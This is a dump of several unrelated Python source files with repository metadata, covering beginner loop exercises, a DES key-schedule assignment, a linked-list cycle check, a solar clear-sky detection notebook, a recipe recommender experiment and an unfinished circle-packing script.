print(stringa[0:4])
print(stringa[3:])
#print(lista) -> stampa il valroe della lista
for elemento in lista:
print("ciao1")
#print(elemento) ->stampa il valroe della lista, uno per volta
for indice, el in enumerate(lista):
print("ciao2")
#indice è il numero della elemento a cui siamo arrivati, -1
#el è l'elemento della lista nel determinato indice a cui siamo arrivati
#print(el) -> stampa il valore della lista a quel determinato indice
#print(lista[indice]) == print8(el)
for indice in range(0 , len(lista)):
print("ciao3")
#range identifica un campo in cui possiamo mouverci
#len misura la lunghezza della lista
#indice è il numero corrispondente alla cella a cui siamo arrivati
#print(lista[indice]) -> stampa il valore della lista a quel determinato indice
dizionario = {1:"Antonelli", 2:"Becchis", 3:"Bianco", 4:"Bongiovanni", 20:"Piumatto"}
for elemen in dizionario:
print(dizionario[elemen])
| [
"noreply@github.com"
] | noreply@github.com |
e8063309a45432e5690789a729c9e10f56504335 | c5828337255cb038a5c625ac28dd6805631abc06 | /src/accTest/exceptions.py | bc72ccea49aab004b9dbc08e57f32b49f78a056a | [] | no_license | Wei-N-Ning/accTest | b28d06e5e19558287afd815fbd0429219e9acea3 | a37a9679cf5f58413158e75a789eeb6f3d4d159c | refs/heads/master | 2021-03-29T11:04:44.280390 | 2017-09-12T13:01:00 | 2017-09-12T13:01:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,100 | py |
class MissingProperty(Exception):
def __init__(self, name):
super(MissingProperty, self).__init__(
'Property: {} does not exist on fixture'.format(name)
)
class BrokenTask(Exception):
def __init__(self, task):
super(Exception, self).__init__(
'Task {} is not associated with any fixture (orphaned task).'.format(task.fullName())
)
class CanNotLoadTask(Exception):
def __init__(self, filePath, dslTaskName, msg=''):
super(CanNotLoadTask, self).__init__(
'Can not load task!\nSearch path: {}, Task: {}\nReason: {}'.format(filePath, dslTaskName, msg)
)
class MalformedTaskName(Exception):
def __init__(self, dslTaskName):
super(MalformedTaskName, self).__init__(
'Only name that contains $TYPE or $TYPE:$INSTANCE is supported! Got: {}'.format(dslTaskName)
)
class InvalidDslFilePath(Exception):
def __init__(self, dslFilePath):
super(InvalidDslFilePath, self).__init__(
'Invalid dsl document file path: {}'.format(dslFilePath)
) | [
"macgnw@gmail.com"
] | macgnw@gmail.com |
18952228b994c5076832cba456a033cd3d575e08 | 8d7fa86fec4e60c8fb7dc05729c00cbb5172db71 | /src/utils/expriments.py | d58d64ab33503e3b943cd70c577fe376ded86cd0 | [] | no_license | alexsanjoseph/customized-recipe | 4abc33de325b41a53541b634ac2d3a721776624d | d91ee3aa355405514392e537dfcb097c1364b3d1 | refs/heads/master | 2023-04-26T08:53:31.926166 | 2021-05-25T15:32:31 | 2021-05-25T15:32:31 | 370,742,445 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,390 | py | import pandas as pd
import numpy as np
import recmetrics
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import OneHotEncoder
recipe_data = pd.read_csv('../datasets/epirecipes/user_profile.csv')
test_user_data = pd.read_csv('../datasets/epirecipes/test_useers.csv')
catalog = recipe_data.loc[:, 'recipeTitle'].unique().tolist()
le = LabelEncoder()
recipe_data['gender'] = le.fit_transform(recipe_data['gender'])
recipe_data['goal'] = le.fit_transform(recipe_data['goal'])
recipe_data['userId'] = le.fit_transform(recipe_data['userId'])
test_user_data['gender'] = le.fit_transform(test_user_data['gender'])
test_user_data['goal'] = le.fit_transform(test_user_data['goal'])
def find_recommendation(usserId, age, ggndeer, goall):
test_user = pd.DataFrame(
{'userId': usserId,
'age': age,
'gender': ggndeer,
'goal': goall}, index=[0])
top_10_similar_users_indices = np.argsort(-cosine_similarity(test_user.loc[:, ['age', 'gender','goal']],
recipe_data.loc[:, ['age', 'gender','goal']])[0])[:10]
f_l = list()
print(top_10_similar_users_indices)
for i in top_10_similar_users_indices:
if(recipe_data.loc[i,:].rating>=3):
#print(recipe_data.loc[i,'recipeTitle'])
f_l.append(recipe_data.loc[i,'recipeTitle'])
return f_l[:5]
res_diict = dict()
resllist = list()
for index, row in test_user_data.iterrows():
recommmendationlist = find_recommendation(row['userId'], row['age'], row['gender'], row['goal'])
res_diict[row['userId']] = recommmendationlist
resllist.append(recommmendationlist)
print(resllist)
length = max(map(len, resllist))
y=np.array([xi+['']*(length-len(xi)) for xi in resllist])
onehot_encoder = OneHotEncoder(handle_unknown='ignore')
onehot_encoder.fit(y)
onehotlabels = onehot_encoder.transform(y).toarray()
ssimilarity_array= cosine_similarity(onehotlabels)
ssimilarity_array_numpy_arr = np.matrix(ssimilarity_array)
upper_diagoonal = np.triu(ssimilarity_array_numpy_arr, 1)
upper_diagoonal_indiices = np.triu_indices_from(ssimilarity_array_numpy_arr, 1)
print(upper_diagoonal)
ltri = np.tril(ssimilarity_array_numpy_arr, -1)
ltri = ltri[np.nonzero(ltri)]
print("presonalization score: " + str(recmetrics.personalization(y))) | [
"alexsanjoseph@gmail.com"
] | alexsanjoseph@gmail.com |
e26e39f00e77ed06034df934564072590fdff2a2 | 5fff8b7eb7d83d3923738970c722c29576d8796a | /debuging.py | 0b043efe604d59591f80965eeea54b01b29723a1 | [] | no_license | honglanfcb/NLPCC_bert | 9185dd9a749f6b42318ba776b555f3024a16cb61 | 4a9bd0360fb0aa25428384f9f664e70c7158d9a6 | refs/heads/master | 2020-11-26T22:57:11.319050 | 2019-12-22T09:14:15 | 2019-12-22T09:14:15 | 229,223,921 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | with open("D:/program/git/Steve/NLPCC_bert/aa.txt", 'w') as f:
f.write("debug") | [
"w653771147@gmail.com"
] | w653771147@gmail.com |
8a8d29142bd33b8d6b538cb5bef48f3cbdb18df6 | fd0ab0f840ead868ea7b06003a76422665970903 | /16IT112_IT352_P2.py | 889f70498b2eabd2f6c4b33172152743513ba0ec | [] | no_license | divyamsm/6thsem | 593c14ed63af8791b11d9783ad655a5363351c65 | aee13df91919818a8efaee84140b04b8809a135a | refs/heads/master | 2020-04-15T21:13:45.515170 | 2019-01-30T10:27:37 | 2019-01-30T10:27:37 | 165,025,436 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,582 | py | '''Read Input'''
from numpy import binary_repr
entry = str(input("Give the string "))
if len(entry)<8:
print("Error, length less than 8")
exit()
usercode = str(input("Enter code 1 (first 8 chars) or 2 (last 8 chars) "))
key_stage_1 = []
if usercode == '1':
for i in range(8):
key_stage_1.append(ord(entry[i]))
elif usercode == '2':
entry = entry[-8:]
for i in range(8):
key_stage_1.append(ord(entry[i]))
else:
print("Error, invalid code")
exit()
'''ASCII TO BINARY'''
for i in range(len(key_stage_1)):
key_stage_1[i] = binary_repr(key_stage_1[i],width = 8)
'''PC-1'''
PC_1_table = [57, 49, 41, 33, 25, 17, 9,
1, 58, 50, 42, 34, 26, 18,
10, 2, 59, 51, 43, 35, 27,
19, 11, 3, 60, 52, 44, 36,
63, 55, 47, 39, 31, 23, 15,
7, 62, 54, 46, 38, 30, 22,
14, 6, 61, 53, 45, 37, 29,
21, 13, 5, 28, 20, 12, 4]
'''convert the 64 bit values to 56 bit values and subtract 1 for index values'''
for i in range(len(PC_1_table)):
PC_1_table[i] -= 1
key_stage_1 = ''.join(key_stage_1)
key_stage_2 = [2 for i in range(56)]
'''replace values...perform pc1 operation'''
for i in range(56):
key_stage_2[i] = key_stage_1[PC_1_table[i]]
key_stage_2 = ''.join(key_stage_2)
'''PC2 table conversion'''
PC_2_table = [14, 17, 11, 24, 1, 5, 3, 28,
15, 6, 21, 10, 23, 19, 12, 4,
26, 8, 16, 7, 27, 20, 13, 2,
41, 52, 31, 37, 47, 55, 30, 40,
51, 45, 33, 48, 44, 49, 39, 56,
34, 53, 46, 42, 50, 36, 29, 32]
for i in range(len(PC_2_table)):
PC_2_table[i] -=1
def leftshift(test):
tempc = test[0]
test = test[1:]
test += tempc
return test
def round(no,key,pc2,keygroup):
'''left shift'''
lkey = key[:28]
rkey = key[28:]
# print(lkey)
# print(rkey)
if no not in (1,2,9,16):
lkey = leftshift(lkey)
rkey = leftshift(rkey)
lkey = leftshift(lkey)
rkey = leftshift(rkey)
newkey = lkey+rkey
keyop = ['' for _ in range(48)]
for i in range(48):
keyop[i] = newkey[PC_2_table[i]]
keygroup.append(''.join(keyop))
return newkey
'''EXECUTION'''
keygroup = []
prevkey = key_stage_2
for i in range(1,17):
currentkey = round(i,prevkey,PC_2_table,keygroup)
prevkey = currentkey
def tohex(bits):
ans = ''
while len(bits)>0:
current = bits[:4]
bits = bits[4:]
ans += hex(int(current,2))[2:]
return ans
for i in range(len(keygroup)):
print('Round ',i,' key is : ',keygroup[i] ,' in hex : ',tohex(keygroup[i]))
| [
"noreply@github.com"
] | noreply@github.com |
2f0a89a7e8d1b21ac8e5b4f19526282cf6b7c983 | 6f0c99a5959b69f3d44c4232806f72e90777416c | /SCIENTIFIC EXPEDITION/CommonWords.py | 1e8edc6b9a05f48f9e57178a4cf901e2a12b252b | [] | no_license | Marshall00/CheckiO-tasks-solutions | 72cb270ed2f375b0e0c3a214bfdd4e81d72eec71 | ff4bd786b94e3e24509c6507f48d25f70c2f83cf | refs/heads/master | 2020-04-16T12:01:04.809750 | 2019-01-25T21:24:57 | 2019-01-25T21:24:57 | 165,561,602 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 562 | py | def checkio(first, second):
lst=[] #In this list we will keep common words for both sets
x=first.split(',') #Create list of all words in x string
y=second.split(',')#Create list of all words in y string
x_set=set(x) #Create set based on x list
y_set=set(y) #Create set based on y list
s=x_set.intersection(y_set) #set of all common words
for element in s:
lst.append(element) #list of all common words created based on s-set
return ','.join(sorted(lst))#Create alpah. ordered string with all words separated by comma
| [
"noreply@github.com"
] | noreply@github.com |
f5d77757b660bda4bd0936356a8d6d7361827530 | a81f0c4ceeb121c61c40eec52c97515110545f69 | /controllers/utils.py | 36fd3fc9b4946eaa8a8a3ae3d0b5f58ecc377eed | [] | no_license | msergeyk/yandex_backend | 11de04aa73542842a144b41f5f4a0d79f26ee5c2 | dd3fabe2df5f829a31b9bf19996f6ac6c0e28cce | refs/heads/main | 2023-03-31T03:25:01.866756 | 2021-03-29T20:46:35 | 2021-03-29T20:46:35 | 352,032,449 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 687 | py | from datetime import datetime
from intervals.exc import IllegalArgument
def process_str(s):
return datetime.strptime(s, "%H:%M").strftime("%Y-%m-%d %H:%M")
def process_str_list(str_list):
return [
f"[{process_str(s.split('-')[0])}, " f"{process_str(s.split('-')[1])}]"
for s in str_list
]
def process_dti(x):
return str(x)[12:17] + "-" + str(x)[33:38]
def intersect(seg1, seg2):
flag = False
for x in seg1:
if flag is True:
break
for y in seg2:
try:
x & y
flag = True
break
except IllegalArgument:
continue
return flag
| [
"msergey1996@mail.ru"
] | msergey1996@mail.ru |
dbe21cb50ad0b0cdc32dd28a4cdcb0ed69808a08 | 8ade5c2f29e41bc79eb917c217e0adc1057db87d | /src/features/gaia-sdss/consolidate.py | 5f0609d82640146c4acd9942cdbdacafc0342d72 | [
"MIT"
] | permissive | jastudillo1/A-Reinforcement-Learning-based-Follow-Up-Framework | 963c13dc0e4feccf68c50025f14914e31e421012 | 930fa3089230fdaec44e99d1d36e7970824708fd | refs/heads/master | 2023-04-10T19:51:40.997654 | 2022-11-17T01:39:11 | 2022-11-17T01:39:11 | 329,093,101 | 0 | 0 | null | 2022-11-17T01:39:12 | 2021-01-12T19:38:59 | Jupyter Notebook | UTF-8 | Python | false | false | 1,543 | py | import numpy as np
import pandas as pd
def append_sdss_id(xmatch):
plate = [str(p).zfill(4) for p in xmatch.PLATE_sdss]
fiber = [str(f).zfill(4) for f in xmatch.FIBERID_sdss]
mjd = xmatch.MJD_sdss
ids = ['spec-{}-{}-{}.fits'.format(p, m, f) for p,m,f in zip(plate, mjd, fiber)]
xmatch['id_sdss'] = ids
return xmatch
if __name__=='__main__':
ctlg_dir = '../../../data/catalogues'
ftrs_dir = '../../../data/features'
spec_path = f'{ftrs_dir}/gaia-sdss/features_spectra.csv'
rnn_path = f'{ftrs_dir}/gaia-sdss/features_rnn.csv'
color_path = f'{ftrs_dir}/gaia-sdss/features_color.csv'
xmatch_path = f'{ctlg_dir}/gaia-sdss/cross-match-labels.csv'
save_path = f'{ftrs_dir}/gaia-sdss/features.csv'
ftrs_spectra = pd.read_csv(spec_path)
ftrs_rnn = pd.read_csv(rnn_path)
ftrs_color = pd.read_csv(color_path)
xmatch = pd.read_csv(xmatch_path)
xmatch = append_sdss_id(xmatch)
xmatch = xmatch[['source_id_gaia', 'id_sdss', 'best_class_name_gaia']]
xmatch = xmatch.rename(columns={'best_class_name_gaia': 'label', 'source_id_gaia': 'id_gaia'})
xmatch = xmatch.merge(ftrs_spectra, on='id_sdss', how='inner')
xmatch = xmatch.merge(ftrs_rnn, on='id_gaia', how='inner')
xmatch = xmatch.merge(ftrs_color, on='id_gaia', how='inner')
features_cols = set(xmatch.columns) - set(['id_gaia', 'id_sdss', 'label'])
reorder = ['id_gaia', 'id_sdss', 'label'] + sorted(list(features_cols))
xmatch = xmatch[reorder]
xmatch.to_csv(save_path, index=False) | [
"jastudillo@g.harvard.edu"
] | jastudillo@g.harvard.edu |
7519b3756f10f14a5efbed78d21cd03b01e3570b | 0a85e9ecb51c89110794aeb399fc3ccc0bff8c43 | /Udacity/1. Data Structures/2. Linked List/detecting_loops.py | 7dde5625ea99184e444c23e219dd8ab70ca841bc | [] | no_license | jordan-carson/Data_Structures_Algos | 6d246cd187e3c3e36763f1eedc535ae1b95c0b18 | 452bb766607963e5ab9e39a354a24ebb26ebaaf5 | refs/heads/master | 2020-12-02T23:19:11.315890 | 2020-09-15T01:23:29 | 2020-09-15T01:23:29 | 231,147,094 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,569 | py | class Node:
def __init__(self, value):
self.value = value
self.next = None
class LinkedList:
def __init__(self, init_list=None):
self.head = None
if init_list:
for value in init_list:
self.append(value)
def append(self, value):
if self.head is None:
self.head = Node(value)
return
# Move to the tail (the last node)
node = self.head
while node.next:
node = node.next
node.next = Node(value)
return
def iscircular(linked_list):
if linked_list.head is None:
return False
slow = linked_list.head
fast = linked_list.head
while slow and fast and fast.next:
fast = fast.next.next
slow = slow.next
if fast == slow:
return True
return False
if __name__ == '__main__':
list_with_loop = LinkedList([2, -1, 3, 0, 5])
# Creating a loop where the last node points back to the second node
loop_start = list_with_loop.head.next
node = list_with_loop.head
while node.next:
node = node.next
node.next = loop_start
small_loop = LinkedList([0])
small_loop.head.next = small_loop.head
print ("Pass" if iscircular(list_with_loop) else "Fail")
print ("Pass" if not iscircular(LinkedList([-4, 7, 2, 5, -1])) else "Fail")
print ("Pass" if not iscircular(LinkedList([1])) else "Fail")
print ("Pass" if iscircular(small_loop) else "Fail")
print ("Pass" if not iscircular(LinkedList([])) else "Fail")
| [
"jordanlouiscarson@gmail.com"
] | jordanlouiscarson@gmail.com |
acc99a53304ab28458e6f36b7b8ef9b70fff4dda | b2de663ffa58dbb9189e61ca83097b1f5a1e070f | /4_ml_exploration_combined_training_new_features_new_clf.py | 2c7deb2e553671fde8f7b625b67898363650134e | [] | no_license | benbenboben/test | 9c456b19e47b270d4ec3558220731cae324ef4d8 | 9bd6a7a820953754cae89be2acf09e79558a2fcf | refs/heads/master | 2021-09-03T23:46:18.488394 | 2018-01-12T23:19:42 | 2018-01-12T23:19:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,008 | py |
# coding: utf-8
# # Table of Contents
# <p><div class="lev1 toc-item"><a href="#Import-and-setup-data" data-toc-modified-id="Import-and-setup-data-1"><span class="toc-item-num">1 </span>Import and setup data</a></div><div class="lev1 toc-item"><a href="#Train-model" data-toc-modified-id="Train-model-2"><span class="toc-item-num">2 </span>Train model</a></div><div class="lev1 toc-item"><a href="#Test-on-ground-data" data-toc-modified-id="Test-on-ground-data-3"><span class="toc-item-num">3 </span>Test on ground data</a></div><div class="lev2 toc-item"><a href="#SRRL" data-toc-modified-id="SRRL-31"><span class="toc-item-num">3.1 </span>SRRL</a></div><div class="lev2 toc-item"><a href="#Sandia-RTC" data-toc-modified-id="Sandia-RTC-32"><span class="toc-item-num">3.2 </span>Sandia RTC</a></div><div class="lev2 toc-item"><a href="#ORNL" data-toc-modified-id="ORNL-33"><span class="toc-item-num">3.3 </span>ORNL</a></div>
# In[1]:
import pandas as pd
import numpy as np
import os
import datetime
import matplotlib
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
from sklearn import tree
import pytz
import itertools
import visualize
import utils
import pydotplus
from sklearn import metrics
from sklearn import ensemble
from sklearn import linear_model
import pvlib
import cs_detection
import visualize_plotly as visualize
from IPython.display import Image
get_ipython().magic('load_ext autoreload')
get_ipython().magic('autoreload 2')
np.set_printoptions(precision=4)
get_ipython().magic('matplotlib notebook')
import warnings
warnings.filterwarnings('ignore')
# # Import and setup data
# Only making ground predictions using PVLib clearsky model and statistical model. NSRDB model won't be available to ground measurements.
# In[2]:
nsrdb_srrl = cs_detection.ClearskyDetection.read_pickle('srrl_nsrdb_1.pkl.gz')
nsrdb_srrl.df.index = nsrdb_srrl.df.index.tz_convert('MST')
nsrdb_srrl.time_from_solar_noon('Clearsky GHI pvlib', 'tfn')
nsrdb_abq = cs_detection.ClearskyDetection.read_pickle('abq_nsrdb_1.pkl.gz')
nsrdb_abq.df.index = nsrdb_abq.df.index.tz_convert('MST')
nsrdb_abq.time_from_solar_noon('Clearsky GHI pvlib', 'tfn')
nsrdb_ornl = cs_detection.ClearskyDetection.read_pickle('ornl_nsrdb_1.pkl.gz')
nsrdb_ornl.df.index = nsrdb_ornl.df.index.tz_convert('EST')
nsrdb_ornl.time_from_solar_noon('Clearsky GHI pvlib', 'tfn')
# # Train model
# * Train model on all available NSRBD data
# * ORNL
# * Sandia RTC
# * SRRL
#
# 1. Scale model clearsky (PVLib)
# 2. Calculate training metrics
# 3. Train model
# In[3]:
nsrdb_srrl.scale_model('GHI', 'Clearsky GHI pvlib', 'sky_status')
nsrdb_abq.scale_model('GHI', 'Clearsky GHI pvlib', 'sky_status')
nsrdb_ornl.scale_model('GHI', 'Clearsky GHI pvlib', 'sky_status')
# In[4]:
utils.calc_all_window_metrics(nsrdb_srrl.df, 3, meas_col='GHI', model_col='Clearsky GHI pvlib', overwrite=True)
utils.calc_all_window_metrics(nsrdb_abq.df, 3, meas_col='GHI', model_col='Clearsky GHI pvlib', overwrite=True)
utils.calc_all_window_metrics(nsrdb_ornl.df, 3, meas_col='GHI', model_col='Clearsky GHI pvlib', overwrite=True)
# In[5]:
feature_cols = [
'tfn',
'abs_ideal_ratio_diff',
'abs_ideal_ratio_diff mean',
'abs_ideal_ratio_diff std',
'abs_ideal_ratio_diff max',
'abs_ideal_ratio_diff min',
'GHI Clearsky GHI pvlib gradient ratio',
'GHI Clearsky GHI pvlib gradient ratio mean',
'GHI Clearsky GHI pvlib gradient ratio std',
'GHI Clearsky GHI pvlib gradient ratio min',
'GHI Clearsky GHI pvlib gradient ratio max',
'GHI Clearsky GHI pvlib gradient second ratio',
'GHI Clearsky GHI pvlib gradient second ratio mean',
'GHI Clearsky GHI pvlib gradient second ratio std',
'GHI Clearsky GHI pvlib gradient second ratio min',
'GHI Clearsky GHI pvlib gradient second ratio max',
'GHI Clearsky GHI pvlib line length ratio',
'GHI Clearsky GHI pvlib line length ratio gradient',
'GHI Clearsky GHI pvlib line length ratio gradient second'
]
target_cols = ['sky_status']
vis = visualize.Visualizer()
vis.plot_corr_matrix(nsrdb_srrl.df[feature_cols].corr().values, labels=feature_cols)
# In[6]:
best_params = {'max_depth': 4, 'n_estimators': 128}
# In[7]:
clf = ensemble.RandomForestClassifier(**best_params, n_jobs=-1)
# In[8]:
X = np.vstack((nsrdb_srrl.df[feature_cols].values,
nsrdb_abq.df[feature_cols].values,
nsrdb_ornl.df[feature_cols].values))
y = np.vstack((nsrdb_srrl.df[target_cols].values,
nsrdb_abq.df[target_cols].values,
nsrdb_ornl.df[target_cols].values))
vis = visualize.Visualizer()
vis.plot_corr_matrix(nsrdb_srrl.df[feature_cols].corr().values, labels=feature_cols)
# In[ ]:
# In[9]:
get_ipython().run_cell_magic('time', '', 'clf.fit(X, y.flatten())')
# # Test on ground data
# ## SRRL
# In[10]:
ground = cs_detection.ClearskyDetection.read_pickle('srrl_ground_1.pkl.gz')
# In[11]:
ground.df.index = ground.df.index.tz_convert('MST')
# In[12]:
ground.trim_dates('10-01-2011', '10-16-2011')
# In[13]:
ground.scale_model('GHI', 'Clearsky GHI pvlib', 'sky_status pvlib')
# In[14]:
ground.time_from_solar_noon('Clearsky GHI pvlib', 'tfn')
# In[15]:
test = ground
# In[16]:
pred = test.iter_predict_daily(feature_cols, 'GHI', 'Clearsky GHI pvlib', clf, 61, by_day=True, multiproc=True)
pred = pred.astype(bool)
# In[17]:
vis = visualize.Visualizer()
# In[18]:
vis.add_line_ser(test.df['GHI'], 'GHI')
vis.add_line_ser(test.df['Clearsky GHI pvlib'], 'GHI_cs')
vis.add_circle_ser(test.df[(test.df['sky_status pvlib'] == 0) & (pred)]['GHI'], 'ML clear only')
vis.add_circle_ser(test.df[(test.df['sky_status pvlib'] == 1) & (~pred)]['GHI'], 'PVLib clear only')
vis.add_circle_ser(test.df[(test.df['sky_status pvlib'] == 1) & (pred)]['GHI'], 'ML+PVLib clear only')
vis.add_line_ser(test.df['abs_ideal_ratio_diff'] * 100)
# In[19]:
vis.show()
# In[20]:
ground = cs_detection.ClearskyDetection.read_pickle('srrl_ground_1.pkl.gz')
# In[21]:
ground.df.index = ground.df.index.tz_convert('MST')
# In[22]:
ground.trim_dates('10-01-2011', '10-16-2011')
# In[23]:
ground.time_from_solar_noon('Clearsky GHI pvlib', 'tfn')
# In[24]:
ground.df = ground.df.resample('30T').apply(lambda x: x[len(x) // 2])
# In[25]:
test= ground
# In[26]:
pred = test.iter_predict_daily(feature_cols, 'GHI', 'Clearsky GHI pvlib', clf, 3, by_day=True, multiproc=True)
pred = pred.astype(bool)
# In[27]:
vis = visualize.Visualizer()
# In[28]:
srrl_tmp = cs_detection.ClearskyDetection(nsrdb_srrl.df)
srrl_tmp.intersection(ground.df.index)
vis.add_line_ser(test.df['GHI'], 'GHI')
vis.add_line_ser(test.df['Clearsky GHI pvlib'], 'GHI_cs')
vis.add_circle_ser(test.df[(srrl_tmp.df['sky_status'] == 0) & (pred)]['GHI'], 'ML clear only')
vis.add_circle_ser(test.df[(srrl_tmp.df['sky_status'] == 1) & (~pred)]['GHI'], 'NSRDB clear only')
vis.add_circle_ser(test.df[(srrl_tmp.df['sky_status'] == 1) & (pred)]['GHI'], 'ML+NSRDB clear only')
vis.add_line_ser(test.df['abs_ideal_ratio_diff'] * 100)
# In[29]:
vis.show()
# In[ ]:
# ## Sandia RTC
# In[30]:
ground = cs_detection.ClearskyDetection.read_pickle('abq_ground_1.pkl.gz')
# In[31]:
ground.df.index = ground.df.index.tz_convert('MST')
# In[32]:
ground.trim_dates('10-01-2015', '10-16-2015')
# In[33]:
ground.time_from_solar_noon('Clearsky GHI pvlib', 'tfn')
# In[34]:
test = ground
# In[35]:
pred = test.iter_predict_daily(feature_cols, 'GHI', 'Clearsky GHI pvlib', clf, 61, by_day=True, multiproc=True)
pred = pred.astype(bool)
# In[36]:
vis = visualize.Visualizer()
# In[37]:
vis.add_line_ser(test.df['GHI'], 'GHI')
vis.add_line_ser(test.df['Clearsky GHI pvlib'], 'GHI_cs')
vis.add_circle_ser(test.df[(test.df['sky_status pvlib'] == 0) & (pred)]['GHI'], 'ML clear only')
vis.add_circle_ser(test.df[(test.df['sky_status pvlib'] == 1) & (~pred)]['GHI'], 'PVLib clear only')
vis.add_circle_ser(test.df[(test.df['sky_status pvlib'] == 1) & (pred)]['GHI'], 'ML+PVLib clear only')
vis.add_line_ser(test.df['abs_ideal_ratio_diff'] * 100)
# In[38]:
vis.show()
# In[39]:
ground = cs_detection.ClearskyDetection.read_pickle('abq_ground_1.pkl.gz')
# In[40]:
ground.df.index = ground.df.index.tz_convert('MST')
# In[41]:
ground.trim_dates('10-01-2015', '10-16-2015')
# In[42]:
ground.time_from_solar_noon('Clearsky GHI pvlib', 'tfn')
# In[43]:
ground.df = ground.df.resample('30T').apply(lambda x: x[len(x) // 2])
# In[44]:
test= ground
# In[45]:
pred = test.iter_predict_daily(feature_cols, 'GHI', 'Clearsky GHI pvlib', clf, 3, by_day=True, multiproc=True)
pred = pred.astype(bool)
# In[46]:
vis = visualize.Visualizer()
# In[47]:
abq_tmp = cs_detection.ClearskyDetection(nsrdb_abq.df)
abq_tmp.intersection(ground.df.index)
vis.add_line_ser(test.df['GHI'], 'GHI')
vis.add_line_ser(test.df['Clearsky GHI pvlib'], 'GHI_cs')
vis.add_circle_ser(test.df[(abq_tmp.df['sky_status'] == 0) & (pred)]['GHI'], 'ML clear only')
vis.add_circle_ser(test.df[(abq_tmp.df['sky_status'] == 1) & (~pred)]['GHI'], 'NSRDB clear only')
vis.add_circle_ser(test.df[(abq_tmp.df['sky_status'] == 1) & (pred)]['GHI'], 'ML+NSRDB clear only')
vis.add_line_ser(test.df['abs_ideal_ratio_diff'] * 100)
# In[48]:
vis.show()
# ## ORNL
# In[49]:
ground = cs_detection.ClearskyDetection.read_pickle('ornl_ground_1.pkl.gz')
# In[50]:
ground.trim_dates('10-01-2008', '10-16-2008')
# In[51]:
ground.time_from_solar_noon('Clearsky GHI pvlib', 'tfn')
# In[52]:
ground.scale_model('GHI', 'Clearsky GHI pvlib', 'sky_status pvlib')
# In[53]:
test = ground
# In[54]:
# pred = clf.predict(test.df[feature_cols].values)
pred = test.iter_predict_daily(feature_cols, 'GHI', 'Clearsky GHI pvlib', clf, 61, by_day=True, multiproc=True)
pred = pred.astype(bool)
# In[55]:
vis = visualize.Visualizer()
# In[56]:
vis.add_line_ser(test.df['GHI'], 'GHI')
vis.add_line_ser(test.df['Clearsky GHI pvlib'], 'GHI_cs')
vis.add_circle_ser(test.df[(test.df['sky_status pvlib'] == 0) & (pred)]['GHI'], 'ML clear only')
vis.add_circle_ser(test.df[(test.df['sky_status pvlib'] == 1) & (~pred)]['GHI'], 'PVLib clear only')
vis.add_circle_ser(test.df[(test.df['sky_status pvlib'] == 1) & (pred)]['GHI'], 'ML+PVLib clear only')
vis.add_line_ser(test.df['abs_ideal_ratio_diff'] * 100)
# In[57]:
vis.show()
# In[58]:
ground = cs_detection.ClearskyDetection.read_pickle('ornl_ground_1.pkl.gz')
# In[59]:
ground.df.index = ground.df.index.tz_convert('EST')
# In[60]:
ground.trim_dates('10-01-2008', '10-16-2008')
# In[61]:
ground.time_from_solar_noon('Clearsky GHI pvlib', 'tfn')
# In[62]:
ground.df = ground.df.resample('30T').apply(lambda x: x[len(x) // 2])
# In[63]:
test= ground
# In[64]:
pred = test.iter_predict_daily(feature_cols, 'GHI', 'Clearsky GHI pvlib', clf, 3, by_day=True, multiproc=True)
pred = pred.astype(bool)
# In[65]:
vis = visualize.Visualizer()
# In[66]:
ornl_tmp = cs_detection.ClearskyDetection(nsrdb_ornl.df)
ornl_tmp.intersection(ground.df.index)
vis.add_line_ser(test.df['GHI'], 'GHI')
vis.add_line_ser(test.df['Clearsky GHI pvlib'], 'GHI_cs')
vis.add_circle_ser(test.df[(ornl_tmp.df['sky_status'] == 0) & (pred)]['GHI'], 'ML clear only')
vis.add_circle_ser(test.df[(ornl_tmp.df['sky_status'] == 1) & (~pred)]['GHI'], 'NSRDB clear only')
vis.add_circle_ser(test.df[(ornl_tmp.df['sky_status'] == 1) & (pred)]['GHI'], 'ML+NSRDB clear only')
vis.add_line_ser(test.df['abs_ideal_ratio_diff'] * 100)
# In[67]:
vis.show()
# In[68]:
vis = visualize.Visualizer()
vis.add_bar(feature_cols, clf.feature_importances_)
vis.show()
# In[69]:
import pickle
# In[70]:
with open('trained_model.pkl', 'wb') as f:
pickle.dump(clf, f)
# In[71]:
with open('trained_model.pkl', 'rb') as f:
new_clf = pickle.load(f)
# In[72]:
new_clf is clf
# In[73]:
clf.get_params()
# In[74]:
new_clf.get_params()
# In[ ]:
| [
"ellis.bh89@gmail.com"
] | ellis.bh89@gmail.com |
498ead3462fc012d19f998fbd9745d488750c4cc | 1843a687308bbdd664f9edf763145d27ee826eb6 | /unit3/cir-pack_tsc.py | a10f57950a51b2fc621569b2aea7e77501a7d65f | [] | no_license | Lupen14461/study1 | 1f47c4d1d0362c4db9dd92c35d72c92eaf59d634 | a29eb8a8b98ff8d739c64e45e7db649ae30cf5d5 | refs/heads/master | 2021-01-06T14:24:09.426103 | 2020-05-27T03:52:24 | 2020-05-27T03:52:24 | 241,359,104 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,027 | py | '''
在查询资料和与其他同学讨论后,
'''
import numpy as np
import random
import matplotlib.pyplot as plt
from scipy.optimize import minimize
#定义圆类
class circle:
def __init__(self, radius = 0, x = 0, y = 0):
self.radius = radius
self.x = x
self.y = y
def print_circle(self):
print('radius={}, coordinate=({},{})'.format(self.radius, self.x, self.y))
#计算两圆心之间距离
def distance(self, c2):
dis = ((self.x-c2.x)**2+(self.y-c2.y)**2)**0.5
return dis
#判断新圆与现存圆是否相交,相交为0,全不相交为1
def ifcross(self, c_list):
for i in range (len(c_list)):
c2 = c_list[i]
r1 = self.radius
r2 = c2.radius
rr = r1+r2
dis = self.distance(c2)
if dis < rr:
return 0
return 1
#判断圆是否越界,越界为0,不越界为1
def ifexcess(self):
r = self.radius
x = self.x
y = self.y
if x + r > 1 or x - r < -1 or y + r > 1 or y - r < -1:
return 0
else:
return 1
#找出可行的最大半径
